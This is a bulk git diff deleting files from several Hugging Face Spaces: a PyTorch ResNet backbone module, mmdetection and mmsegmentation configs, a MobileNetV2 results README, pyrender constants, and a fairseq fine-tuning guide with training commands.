-from cliport.models.misc import NestedTensor - - - -class FrozenBatchNorm2d(torch.nn.Module): - """ - BatchNorm2d where the batch statistics and the affine parameters are fixed. - - Copy-paste from torchvision.misc.ops with added eps before rqsrt, - without which any other models than torchvision.models.resnet[18,34,50,101] - produce nans. - """ - - def __init__(self, n): - super(FrozenBatchNorm2d, self).__init__() - self.register_buffer("weight", torch.ones(n)) - self.register_buffer("bias", torch.zeros(n)) - self.register_buffer("running_mean", torch.zeros(n)) - self.register_buffer("running_var", torch.ones(n)) - - def _load_from_state_dict( - self, state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs - ): - num_batches_tracked_key = prefix + "num_batches_tracked" - if num_batches_tracked_key in state_dict: - del state_dict[num_batches_tracked_key] - - super(FrozenBatchNorm2d, self)._load_from_state_dict( - state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs - ) - - def forward(self, x): - # move reshapes to the beginning - # to make it fuser-friendly - w = self.weight.reshape(1, -1, 1, 1) - b = self.bias.reshape(1, -1, 1, 1) - rv = self.running_var.reshape(1, -1, 1, 1) - rm = self.running_mean.reshape(1, -1, 1, 1) - eps = 1e-5 - scale = w * (rv + eps).rsqrt() - bias = b - rm * scale - return x * scale + bias - - -class BackboneBase(nn.Module): - def __init__(self, backbone: nn.Module, train_backbone: bool, num_channels: int, return_interm_layers: bool): - super().__init__() - for name, parameter in backbone.named_parameters(): - if not train_backbone or "layer2" not in name and "layer3" not in name and "layer4" not in name: - parameter.requires_grad_(False) - if return_interm_layers: - return_layers = {"layer1": "0", "layer2": "1", "layer3": "2", "layer4": "3"} - else: - return_layers = {"layer4": 0} - self.body = IntermediateLayerGetter(backbone, return_layers=return_layers) - self.num_channels = num_channels - - def forward(self, tensor_list): - xs = self.body(tensor_list.tensors) - out = OrderedDict() - for name, x in xs.items(): - mask = F.interpolate(tensor_list.mask[None].float(), size=x.shape[-2:]).bool()[0] - out[name] = NestedTensor(x, mask) - return out - - -class Backbone(BackboneBase): - """ResNet backbone 
with frozen BatchNorm.""" - - def __init__(self, name: str, train_backbone: bool, return_interm_layers: bool, dilation: bool): - backbone = getattr(torchvision.models, name)( - replace_stride_with_dilation=[False, False, dilation], pretrained=False, norm_layer=FrozenBatchNorm2d - ) - num_channels = 512 if name in ("resnet18", "resnet34") else 2048 - super().__init__(backbone, train_backbone, num_channels, return_interm_layers) - - -class GroupNorm32(torch.nn.GroupNorm): - def __init__(self, num_channels, num_groups=32, **kargs): - super().__init__(num_groups, num_channels, **kargs) - - -class GroupNormBackbone(BackboneBase): - """ResNet backbone with GroupNorm with 32 channels.""" - - def __init__(self, name: str, train_backbone: bool, return_interm_layers: bool, dilation: bool): - name_map = { - "resnet50-gn": ("resnet50", "/checkpoint/szagoruyko/imagenet/22014122/checkpoint.pth"), - "resnet101-gn": ("resnet101", "/checkpoint/szagoruyko/imagenet/22080524/checkpoint.pth"), - } - backbone = getattr(torchvision.models, name_map[name][0])( - replace_stride_with_dilation=[False, False, dilation], pretrained=False, norm_layer=GroupNorm32 - ) - checkpoint = torch.load(name_map[name][1], map_location="cpu") - state_dict = {k[7:]: p for k, p in checkpoint["model"].items()} - backbone.load_state_dict(state_dict) - num_channels = 512 if name_map[name][0] in ("resnet18", "resnet34") else 2048 - super().__init__(backbone, train_backbone, num_channels, return_interm_layers) - - -def replace_bn(m, name=""): - for attr_str in dir(m): - target_attr = getattr(m, attr_str) - if isinstance(target_attr, torch.nn.BatchNorm2d): - frozen = FrozenBatchNorm2d(target_attr.num_features) - bn = getattr(m, attr_str) - frozen.weight.data.copy_(bn.weight) - frozen.bias.data.copy_(bn.bias) - frozen.running_mean.data.copy_(bn.running_mean) - frozen.running_var.data.copy_(bn.running_var) - setattr(m, attr_str, frozen) - for n, ch in m.named_children(): - replace_bn(ch, n) - - -class GN_8(nn.Module): - def __init__(self, num_channels): - super().__init__() - self.gn = torch.nn.GroupNorm(8, num_channels) - - def forward(self, x): - return self.gn(x) - - -class TimmBackbone(nn.Module): - def __init__(self, name, return_interm_layers, main_layer=-1, group_norm=False): - super().__init__() - backbone = create_model(name, pretrained=True, in_chans=3, features_only=True, out_indices=(1, 2, 3, 4)) - - with torch.no_grad(): - replace_bn(backbone) - num_channels = backbone.feature_info.channels()[-1] - self.body = backbone - self.num_channels = num_channels - self.interm = return_interm_layers - self.main_layer = main_layer - - def forward(self, tensor_list): - xs = self.body(tensor_list.tensors) - if not self.interm: - xs = [xs[self.main_layer]] - out = OrderedDict() - for i, x in enumerate(xs): - mask = F.interpolate(tensor_list.mask[None].float(), size=x.shape[-2:]).bool()[0] - out[f"layer{i}"] = NestedTensor(x, mask) - return out - - diff --git a/spaces/Gradio-Blocks/uniformer_image_detection/configs/cascade_rcnn/cascade_mask_rcnn_r50_fpn_1x_coco.py b/spaces/Gradio-Blocks/uniformer_image_detection/configs/cascade_rcnn/cascade_mask_rcnn_r50_fpn_1x_coco.py deleted file mode 100644 index 49ab539aa4cdf7c396b6f109efe2dc7a6d596a2a..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_detection/configs/cascade_rcnn/cascade_mask_rcnn_r50_fpn_1x_coco.py +++ /dev/null @@ -1,5 +0,0 @@ -_base_ = [ - '../_base_/models/cascade_mask_rcnn_r50_fpn.py', - '../_base_/datasets/coco_instance.py', - 
'../_base_/schedules/schedule_1x.py', '../_base_/default_runtime.py' -] diff --git a/spaces/Gradio-Blocks/uniformer_image_detection/configs/faster_rcnn/faster_rcnn_r50_caffe_fpn_mstrain_1x_coco-person-bicycle-car.py b/spaces/Gradio-Blocks/uniformer_image_detection/configs/faster_rcnn/faster_rcnn_r50_caffe_fpn_mstrain_1x_coco-person-bicycle-car.py deleted file mode 100644 index 23d72852f22d025c9eaf2328721909f75b34e2e9..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_detection/configs/faster_rcnn/faster_rcnn_r50_caffe_fpn_mstrain_1x_coco-person-bicycle-car.py +++ /dev/null @@ -1,9 +0,0 @@ -_base_ = './faster_rcnn_r50_caffe_fpn_mstrain_1x_coco.py' -model = dict(roi_head=dict(bbox_head=dict(num_classes=3))) -classes = ('person', 'bicycle', 'car') -data = dict( - train=dict(classes=classes), - val=dict(classes=classes), - test=dict(classes=classes)) - -load_from = 'http://download.openmmlab.com/mmdetection/v2.0/faster_rcnn/faster_rcnn_r50_caffe_fpn_mstrain_3x_coco/faster_rcnn_r50_caffe_fpn_mstrain_3x_coco_bbox_mAP-0.398_20200504_163323-30042637.pth' # noqa diff --git a/spaces/Gradio-Blocks/uniformer_image_detection/configs/gn/mask_rcnn_r50_fpn_gn-all_contrib_2x_coco.py b/spaces/Gradio-Blocks/uniformer_image_detection/configs/gn/mask_rcnn_r50_fpn_gn-all_contrib_2x_coco.py deleted file mode 100644 index 89caaafbc17d871d836e810ba7c038648937254c..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_detection/configs/gn/mask_rcnn_r50_fpn_gn-all_contrib_2x_coco.py +++ /dev/null @@ -1,15 +0,0 @@ -_base_ = '../mask_rcnn/mask_rcnn_r50_fpn_1x_coco.py' -norm_cfg = dict(type='GN', num_groups=32, requires_grad=True) -model = dict( - pretrained='open-mmlab://contrib/resnet50_gn', - backbone=dict(norm_cfg=norm_cfg), - neck=dict(norm_cfg=norm_cfg), - roi_head=dict( - bbox_head=dict( - type='Shared4Conv1FCBBoxHead', - conv_out_channels=256, - norm_cfg=norm_cfg), - mask_head=dict(norm_cfg=norm_cfg))) -# learning policy -lr_config = dict(step=[16, 22]) -runner = dict(type='EpochBasedRunner', max_epochs=24) diff --git a/spaces/Gradio-Blocks/uniformer_image_detection/configs/vfnet/vfnet_x101_32x4d_fpn_mdconv_c3-c5_mstrain_2x_coco.py b/spaces/Gradio-Blocks/uniformer_image_detection/configs/vfnet/vfnet_x101_32x4d_fpn_mdconv_c3-c5_mstrain_2x_coco.py deleted file mode 100644 index ebeef6ff6640e83378391d3ce7072aa296826c32..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_detection/configs/vfnet/vfnet_x101_32x4d_fpn_mdconv_c3-c5_mstrain_2x_coco.py +++ /dev/null @@ -1,16 +0,0 @@ -_base_ = './vfnet_r50_fpn_mdconv_c3-c5_mstrain_2x_coco.py' -model = dict( - pretrained='open-mmlab://resnext101_32x4d', - backbone=dict( - type='ResNeXt', - depth=101, - groups=32, - base_width=4, - num_stages=4, - out_indices=(0, 1, 2, 3), - frozen_stages=1, - norm_cfg=dict(type='BN', requires_grad=True), - norm_eval=True, - style='pytorch', - dcn=dict(type='DCNv2', deform_groups=1, fallback_on_stride=False), - stage_with_dcn=(False, True, True, True))) diff --git a/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/danet/danet_r50-d8_512x512_160k_ade20k.py b/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/danet/danet_r50-d8_512x512_160k_ade20k.py deleted file mode 100644 index 22aaf857c3212d0b36b0b04e7990616025a3ef9b..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/danet/danet_r50-d8_512x512_160k_ade20k.py +++ /dev/null @@ -1,6 +0,0 @@ -_base_ = [ - 
'../_base_/models/danet_r50-d8.py', '../_base_/datasets/ade20k.py', - '../_base_/default_runtime.py', '../_base_/schedules/schedule_160k.py' -] -model = dict( - decode_head=dict(num_classes=150), auxiliary_head=dict(num_classes=150)) diff --git a/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/mobilenet_v2/README.md b/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/mobilenet_v2/README.md deleted file mode 100644 index 7356a0ec4d7205782fe8b27e480311b58d4293ff..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/mobilenet_v2/README.md +++ /dev/null @@ -1,35 +0,0 @@ -# MobileNetV2: Inverted Residuals and Linear Bottlenecks - -## Introduction - - - -```latex -@inproceedings{sandler2018mobilenetv2, - title={Mobilenetv2: Inverted residuals and linear bottlenecks}, - author={Sandler, Mark and Howard, Andrew and Zhu, Menglong and Zhmoginov, Andrey and Chen, Liang-Chieh}, - booktitle={Proceedings of the IEEE conference on computer vision and pattern recognition}, - pages={4510--4520}, - year={2018} -} -``` - -## Results and models - -### Cityscapes - -| Method | Backbone | Crop Size | Lr schd | Mem (GB) | Inf time (fps) | mIoU | mIoU(ms+flip) | config | download | -| ---------- | -------- | --------- | ------: | -------: | -------------- | ----: | ------------- | ---------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -| FCN | M-V2-D8 | 512x1024 | 80000 | 3.4 | 14.2 | 61.54 | - | [config](https://github.com/open-mmlab/mmsegmentation/blob/master/configs/mobilenet_v2/fcn_m-v2-d8_512x1024_80k_cityscapes.py) | [model](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/fcn_m-v2-d8_512x1024_80k_cityscapes/fcn_m-v2-d8_512x1024_80k_cityscapes_20200825_124817-d24c28c1.pth) | [log](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/fcn_m-v2-d8_512x1024_80k_cityscapes/fcn_m-v2-d8_512x1024_80k_cityscapes-20200825_124817.log.json) | -| PSPNet | M-V2-D8 | 512x1024 | 80000 | 3.6 | 11.2 | 70.23 | - | [config](https://github.com/open-mmlab/mmsegmentation/blob/master/configs/mobilenet_v2/pspnet_m-v2-d8_512x1024_80k_cityscapes.py) | [model](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/pspnet_m-v2-d8_512x1024_80k_cityscapes/pspnet_m-v2-d8_512x1024_80k_cityscapes_20200825_124817-19e81d51.pth) | [log](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/pspnet_m-v2-d8_512x1024_80k_cityscapes/pspnet_m-v2-d8_512x1024_80k_cityscapes-20200825_124817.log.json) | -| DeepLabV3 | M-V2-D8 | 512x1024 | 80000 | 3.9 | 8.4 | 73.84 | - | [config](https://github.com/open-mmlab/mmsegmentation/blob/master/configs/mobilenet_v2/deeplabv3_m-v2-d8_512x1024_80k_cityscapes.py) | [model](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/deeplabv3_m-v2-d8_512x1024_80k_cityscapes/deeplabv3_m-v2-d8_512x1024_80k_cityscapes_20200825_124836-bef03590.pth) | [log](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/deeplabv3_m-v2-d8_512x1024_80k_cityscapes/deeplabv3_m-v2-d8_512x1024_80k_cityscapes-20200825_124836.log.json) | -| 
DeepLabV3+ | M-V2-D8 | 512x1024 | 80000 | 5.1 | 8.4 | 75.20 | - | [config](https://github.com/open-mmlab/mmsegmentation/blob/master/configs/mobilenet_v2/deeplabv3plus_m-v2-d8_512x1024_80k_cityscapes.py) | [model](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/deeplabv3plus_m-v2-d8_512x1024_80k_cityscapes/deeplabv3plus_m-v2-d8_512x1024_80k_cityscapes_20200825_124836-d256dd4b.pth) | [log](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/deeplabv3plus_m-v2-d8_512x1024_80k_cityscapes/deeplabv3plus_m-v2-d8_512x1024_80k_cityscapes-20200825_124836.log.json) | - -### ADE20k - -| Method | Backbone | Crop Size | Lr schd | Mem (GB) | Inf time (fps) | mIoU | mIoU(ms+flip) | config | download | -| ---------- | -------- | --------- | ------: | -------: | -------------- | ----: | ------------- | ------------------------------------------------------------------------------------------------------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | -| FCN | M-V2-D8 | 512x512 | 160000 | 6.5 | 64.4 | 19.71 | - | [config](https://github.com/open-mmlab/mmsegmentation/blob/master/configs/mobilenet_v2/fcn_m-v2-d8_512x512_160k_ade20k.py) | [model](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/fcn_m-v2-d8_512x512_160k_ade20k/fcn_m-v2-d8_512x512_160k_ade20k_20200825_214953-c40e1095.pth) | [log](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/fcn_m-v2-d8_512x512_160k_ade20k/fcn_m-v2-d8_512x512_160k_ade20k-20200825_214953.log.json) | -| PSPNet | M-V2-D8 | 512x512 | 160000 | 6.5 | 57.7 | 29.68 | - | [config](https://github.com/open-mmlab/mmsegmentation/blob/master/configs/mobilenet_v2/pspnet_m-v2-d8_512x512_160k_ade20k.py) | [model](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/pspnet_m-v2-d8_512x512_160k_ade20k/pspnet_m-v2-d8_512x512_160k_ade20k_20200825_214953-f5942f7a.pth) | [log](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/pspnet_m-v2-d8_512x512_160k_ade20k/pspnet_m-v2-d8_512x512_160k_ade20k-20200825_214953.log.json) | -| DeepLabV3 | M-V2-D8 | 512x512 | 160000 | 6.8 | 39.9 | 34.08 | - | [config](https://github.com/open-mmlab/mmsegmentation/blob/master/configs/mobilenet_v2/deeplabv3_m-v2-d8_512x512_160k_ade20k.py) | [model](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/deeplabv3_m-v2-d8_512x512_160k_ade20k/deeplabv3_m-v2-d8_512x512_160k_ade20k_20200825_223255-63986343.pth) | [log](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/deeplabv3_m-v2-d8_512x512_160k_ade20k/deeplabv3_m-v2-d8_512x512_160k_ade20k-20200825_223255.log.json) | -| DeepLabV3+ | M-V2-D8 | 512x512 | 160000 | 8.2 | 43.1 | 34.02 | - | [config](https://github.com/open-mmlab/mmsegmentation/blob/master/configs/mobilenet_v2/deeplabv3plus_m-v2-d8_512x512_160k_ade20k.py) | [model](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/deeplabv3plus_m-v2-d8_512x512_160k_ade20k/deeplabv3plus_m-v2-d8_512x512_160k_ade20k_20200825_223255-465a01d4.pth) | [log](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/deeplabv3plus_m-v2-d8_512x512_160k_ade20k/deeplabv3plus_m-v2-d8_512x512_160k_ade20k-20200825_223255.log.json) | diff --git 
a/spaces/Gradio-Blocks/uniformer_image_segmentation/mmseg/version.py b/spaces/Gradio-Blocks/uniformer_image_segmentation/mmseg/version.py deleted file mode 100644 index e090d9f31aae3ce0a8fd6392d519163130f437dc..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_segmentation/mmseg/version.py +++ /dev/null @@ -1,18 +0,0 @@ -# Copyright (c) Open-MMLab. All rights reserved. - -__version__ = '0.13.0' - - -def parse_version_info(version_str): - version_info = [] - for x in version_str.split('.'): - if x.isdigit(): - version_info.append(int(x)) - elif x.find('rc') != -1: - patch_version = x.split('rc') - version_info.append(int(patch_version[0])) - version_info.append(f'rc{patch_version[1]}') - return tuple(version_info) - - -version_info = parse_version_info(__version__) diff --git a/spaces/Grezz/generate_human_motion/pyrender/pyrender/constants.py b/spaces/Grezz/generate_human_motion/pyrender/pyrender/constants.py deleted file mode 100644 index 8a5785b6fdb21910a174252c5af2f05b40ece4a5..0000000000000000000000000000000000000000 --- a/spaces/Grezz/generate_human_motion/pyrender/pyrender/constants.py +++ /dev/null @@ -1,149 +0,0 @@ -DEFAULT_Z_NEAR = 0.05 # Near clipping plane, in meters -DEFAULT_Z_FAR = 100.0 # Far clipping plane, in meters -DEFAULT_SCENE_SCALE = 2.0 # Default scene scale -MAX_N_LIGHTS = 4 # Maximum number of lights of each type allowed -TARGET_OPEN_GL_MAJOR = 4 # Target OpenGL Major Version -TARGET_OPEN_GL_MINOR = 1 # Target OpenGL Minor Version -MIN_OPEN_GL_MAJOR = 3 # Minimum OpenGL Major Version -MIN_OPEN_GL_MINOR = 3 # Minimum OpenGL Minor Version -FLOAT_SZ = 4 # Byte size of GL float32 -UINT_SZ = 4 # Byte size of GL uint32 -SHADOW_TEX_SZ = 2048 # Width and Height of Shadow Textures -TEXT_PADDING = 20 # Width of padding for rendering text (px) - - -# Flags for render type -class RenderFlags(object): - """Flags for rendering in the scene. - - Combine them with the bitwise or. For example, - - >>> flags = OFFSCREEN | SHADOWS_DIRECTIONAL | VERTEX_NORMALS - - would result in an offscreen render with directional shadows and - vertex normals enabled. - """ - NONE = 0 - """Normal PBR Render.""" - DEPTH_ONLY = 1 - """Only render the depth buffer.""" - OFFSCREEN = 2 - """Render offscreen and return the depth and (optionally) color buffers.""" - FLIP_WIREFRAME = 4 - """Invert the status of wireframe rendering for each mesh.""" - ALL_WIREFRAME = 8 - """Render all meshes as wireframes.""" - ALL_SOLID = 16 - """Render all meshes as solids.""" - SHADOWS_DIRECTIONAL = 32 - """Render shadows for directional lights.""" - SHADOWS_POINT = 64 - """Render shadows for point lights.""" - SHADOWS_SPOT = 128 - """Render shadows for spot lights.""" - SHADOWS_ALL = 32 | 64 | 128 - """Render shadows for all lights.""" - VERTEX_NORMALS = 256 - """Render vertex normals.""" - FACE_NORMALS = 512 - """Render face normals.""" - SKIP_CULL_FACES = 1024 - """Do not cull back faces.""" - RGBA = 2048 - """Render the color buffer with the alpha channel enabled.""" - FLAT = 4096 - """Render the color buffer flat, with no lighting computations.""" - SEG = 8192 - - -class TextAlign: - """Text alignment options for captions. - - Only use one at a time. 
- """ - CENTER = 0 - """Center the text by width and height.""" - CENTER_LEFT = 1 - """Center the text by height and left-align it.""" - CENTER_RIGHT = 2 - """Center the text by height and right-align it.""" - BOTTOM_LEFT = 3 - """Put the text in the bottom-left corner.""" - BOTTOM_RIGHT = 4 - """Put the text in the bottom-right corner.""" - BOTTOM_CENTER = 5 - """Center the text by width and fix it to the bottom.""" - TOP_LEFT = 6 - """Put the text in the top-left corner.""" - TOP_RIGHT = 7 - """Put the text in the top-right corner.""" - TOP_CENTER = 8 - """Center the text by width and fix it to the top.""" - - -class GLTF(object): - """Options for GL objects.""" - NEAREST = 9728 - """Nearest neighbor interpolation.""" - LINEAR = 9729 - """Linear interpolation.""" - NEAREST_MIPMAP_NEAREST = 9984 - """Nearest mipmapping.""" - LINEAR_MIPMAP_NEAREST = 9985 - """Linear mipmapping.""" - NEAREST_MIPMAP_LINEAR = 9986 - """Nearest mipmapping.""" - LINEAR_MIPMAP_LINEAR = 9987 - """Linear mipmapping.""" - CLAMP_TO_EDGE = 33071 - """Clamp to the edge of the texture.""" - MIRRORED_REPEAT = 33648 - """Mirror the texture.""" - REPEAT = 10497 - """Repeat the texture.""" - POINTS = 0 - """Render as points.""" - LINES = 1 - """Render as lines.""" - LINE_LOOP = 2 - """Render as a line loop.""" - LINE_STRIP = 3 - """Render as a line strip.""" - TRIANGLES = 4 - """Render as triangles.""" - TRIANGLE_STRIP = 5 - """Render as a triangle strip.""" - TRIANGLE_FAN = 6 - """Render as a triangle fan.""" - - -class BufFlags(object): - POSITION = 0 - NORMAL = 1 - TANGENT = 2 - TEXCOORD_0 = 4 - TEXCOORD_1 = 8 - COLOR_0 = 16 - JOINTS_0 = 32 - WEIGHTS_0 = 64 - - -class TexFlags(object): - NONE = 0 - NORMAL = 1 - OCCLUSION = 2 - EMISSIVE = 4 - BASE_COLOR = 8 - METALLIC_ROUGHNESS = 16 - DIFFUSE = 32 - SPECULAR_GLOSSINESS = 64 - - -class ProgramFlags: - NONE = 0 - USE_MATERIAL = 1 - VERTEX_NORMALS = 2 - FACE_NORMALS = 4 - - -__all__ = ['RenderFlags', 'TextAlign', 'GLTF'] diff --git a/spaces/Guldeniz/aerial-to-map/README.md b/spaces/Guldeniz/aerial-to-map/README.md deleted file mode 100644 index 43121c30c24eebb7e2848743909c3da2d8330c5b..0000000000000000000000000000000000000000 --- a/spaces/Guldeniz/aerial-to-map/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Maps To Aerial -emoji: 📈 -colorFrom: gray -colorTo: purple -sdk: gradio -sdk_version: 2.9.1 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces#reference diff --git a/spaces/Haitangtangtangtang/AnimeBackgroundGAN/README.md b/spaces/Haitangtangtangtang/AnimeBackgroundGAN/README.md deleted file mode 100644 index 9fde1b0be30d306bef54c19fa2057acad76d3fe8..0000000000000000000000000000000000000000 --- a/spaces/Haitangtangtangtang/AnimeBackgroundGAN/README.md +++ /dev/null @@ -1,33 +0,0 @@ ---- -title: AnimeBackgroundGAN -emoji: 🖼 -colorFrom: red -colorTo: indigo -sdk: gradio -app_file: app.py -pinned: true -duplicated_from: akiyamasho/AnimeBackgroundGAN ---- - -# Configuration - -`title`: _string_ -Anime Background GAN - -`emoji`: _string_ -🖼 - -`colorFrom`: _string_ -red - -`colorTo`: _string_ -indigo - -`sdk`: _string_ -gradio - -`app_file`: _string_ -app.py - -`pinned`: _boolean_ -true \ No newline at end of file diff --git a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/shuffled_word_order/README.finetuning.md b/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/shuffled_word_order/README.finetuning.md deleted file mode 100644 index 
ecbcb65884640c3327a2cbaef8aad4f3cfe812f7..0000000000000000000000000000000000000000 --- a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/shuffled_word_order/README.finetuning.md +++ /dev/null @@ -1,135 +0,0 @@ -# Fine-tuning details - -For each task (GLUE and PAWS), we perform hyperparam search for each model, and report the mean and standard deviation across 5 seeds of the best model. First, get the datasets following the instructions in [RoBERTa fine-tuning README](../roberta/README.glue.md). Alternatively, you can use [huggingface datasets](https://huggingface.co/docs/datasets/) to get the task data: - -```python -from datasets import load_dataset -import pandas as pd -from pathlib import Path - -key2file = { -"paws": { - "loc": "paws_data", - "columns": ["id", "sentence1", "sentence2", "label"], - "train": "train.tsv", - "validation": "dev.tsv", - "test": "test.tsv" - } -} - -task_data = load_dataset("paws", "labeled_final") -task_config = key2file["paws"] -save_path = Path(task_config["loc"]) -save_path.mkdir(exist_ok=True, parents=True) -for key, fl in task_config.items(): - if key in ["loc", "columns"]: - continue - print(f"Reading {key}") - columns = task_config["columns"] - df = pd.DataFrame(task_data[key]) - print(df.columns) - df = df[columns] - print(f"Got {len(df)} records") - save_loc = save_path / fl - print(f"Saving to : {save_loc}") - df.to_csv(save_loc, sep="\t", header=None, index=None) - -``` - -- Preprocess using RoBERTa GLUE preprocessing script, while keeping in mind the column numbers for `sentence1`, `sentence2` and `label` (which is 0,1,2 if you save the data according to the above example.) -- Then, fine-tuning is performed similarly to RoBERTa (for example, in case of RTE): - -```bash -TOTAL_NUM_UPDATES=30875 # 10 epochs through RTE for bsz 16 -WARMUP_UPDATES=1852 # 6 percent of the number of updates -LR=2e-05 # Peak LR for polynomial LR scheduler. -NUM_CLASSES=2 -MAX_SENTENCES=16 # Batch size. -SHUFFLED_ROBERTA_PATH=/path/to/shuffled_roberta/model.pt - -CUDA_VISIBLE_DEVICES=0 fairseq-train RTE-bin/ \ - --restore-file $SHUFFLED_ROBERTA_PATH \ - --max-positions 512 \ - --batch-size $MAX_SENTENCES \ - --max-tokens 4400 \ - --task sentence_prediction \ - --reset-optimizer --reset-dataloader --reset-meters \ - --required-batch-size-multiple 1 \ - --init-token 0 --separator-token 2 \ - --arch roberta_large \ - --criterion sentence_prediction \ - --num-classes $NUM_CLASSES \ - --dropout 0.1 --attention-dropout 0.1 \ - --weight-decay 0.1 --optimizer adam --adam-betas "(0.9, 0.98)" --adam-eps 1e-06 \ - --clip-norm 0.0 \ - --lr-scheduler polynomial_decay --lr $LR --total-num-update $TOTAL_NUM_UPDATES --warmup-updates $WARMUP_UPDATES \ - --fp16 --fp16-init-scale 4 --threshold-loss-scale 1 --fp16-scale-window 128 \ - --max-epoch 10 \ - --find-unused-parameters \ - --best-checkpoint-metric accuracy --maximize-best-checkpoint-metric; -``` - -- `TOTAL_NUM_UPDATES` is computed based on the `--batch_size` value and the dataset size. 
-- `WARMUP_UPDATES` is computed as 6% of `TOTAL_NUM_UPDATES` -- Best hyperparam of `--lr` and `--batch_size` is reported below: - -## `--lr` - -| | name | RTE | MRPC | SST-2 | CoLA | QQP | QNLI | MNLI | PAWS | -| --: | :----------- | ----: | ----: | ----: | ----: | ----: | ----: | ----: | ----: | -| 0 | original | 2e-05 | 2e-05 | 1e-05 | 2e-05 | 1e-05 | 1e-05 | 1e-05 | 2e-05 | -| 1 | n_1 | 2e-05 | 1e-05 | 1e-05 | 1e-05 | 3e-05 | 1e-05 | 2e-05 | 2e-05 | -| 2 | n_2 | 2e-05 | 2e-05 | 1e-05 | 1e-05 | 2e-05 | 1e-05 | 1e-05 | 3e-05 | -| 3 | n_3 | 3e-05 | 1e-05 | 2e-05 | 2e-05 | 3e-05 | 1e-05 | 1e-05 | 2e-05 | -| 4 | n_4 | 3e-05 | 1e-05 | 2e-05 | 2e-05 | 2e-05 | 1e-05 | 1e-05 | 2e-05 | -| 5 | r512 | 1e-05 | 3e-05 | 2e-05 | 2e-05 | 3e-05 | 2e-05 | 3e-05 | 2e-05 | -| 6 | rand_corpus | 2e-05 | 1e-05 | 3e-05 | 1e-05 | 3e-05 | 3e-05 | 3e-05 | 2e-05 | -| 7 | rand_uniform | 2e-05 | 1e-05 | 3e-05 | 2e-05 | 3e-05 | 3e-05 | 3e-05 | 1e-05 | -| 8 | rand_init | 1e-05 | 1e-05 | 3e-05 | 1e-05 | 1e-05 | 1e-05 | 2e-05 | 1e-05 | -| 9 | no_pos | 1e-05 | 3e-05 | 2e-05 | 1e-05 | 1e-05 | 1e-05 | 1e-05 | 1e-05 | - -## `--batch_size` - -| | name | RTE | MRPC | SST-2 | CoLA | QQP | QNLI | MNLI | PAWS | -| --: | :----------- | --: | ---: | ----: | ---: | --: | ---: | ---: | ---: | -| 0 | orig | 16 | 16 | 32 | 16 | 16 | 32 | 32 | 16 | -| 1 | n_1 | 32 | 32 | 16 | 32 | 32 | 16 | 32 | 16 | -| 2 | n_2 | 32 | 16 | 32 | 16 | 32 | 32 | 16 | 32 | -| 3 | n_3 | 32 | 32 | 16 | 32 | 32 | 16 | 32 | 32 | -| 4 | n_4 | 32 | 16 | 32 | 16 | 32 | 32 | 32 | 32 | -| 5 | r512 | 32 | 16 | 16 | 32 | 32 | 16 | 16 | 16 | -| 6 | rand_corpus | 16 | 16 | 16 | 16 | 32 | 16 | 16 | 32 | -| 7 | rand_uniform | 16 | 32 | 16 | 16 | 32 | 16 | 16 | 16 | -| 8 | rand_init | 16 | 16 | 32 | 16 | 16 | 16 | 32 | 16 | -| 9 | no_pos | 16 | 32 | 16 | 16 | 32 | 16 | 16 | 16 | - -- Perform inference similar to RoBERTa as well: - -```python -from fairseq.models.roberta import RobertaModel - -roberta = RobertaModel.from_pretrained( - 'checkpoints/', - checkpoint_file='checkpoint_best.pt', - data_name_or_path='PAWS-bin' -) - -label_fn = lambda label: roberta.task.label_dictionary.string( - [label + roberta.task.label_dictionary.nspecial] -) -ncorrect, nsamples = 0, 0 -roberta.cuda() -roberta.eval() -with open('paws_data/dev.tsv') as fin: - fin.readline() - for index, line in enumerate(fin): - tokens = line.strip().split('\t') - sent1, sent2, target = tokens[0], tokens[1], tokens[2] - tokens = roberta.encode(sent1, sent2) - prediction = roberta.predict('sentence_classification_head', tokens).argmax().item() - prediction_label = label_fn(prediction) - ncorrect += int(prediction_label == target) - nsamples += 1 -print('| Accuracy: ', float(ncorrect)/float(nsamples)) - -``` diff --git a/spaces/Harveenchadha/Vakyansh-Malayalam-TTS/ttsv/scripts/glow/train_glow.sh 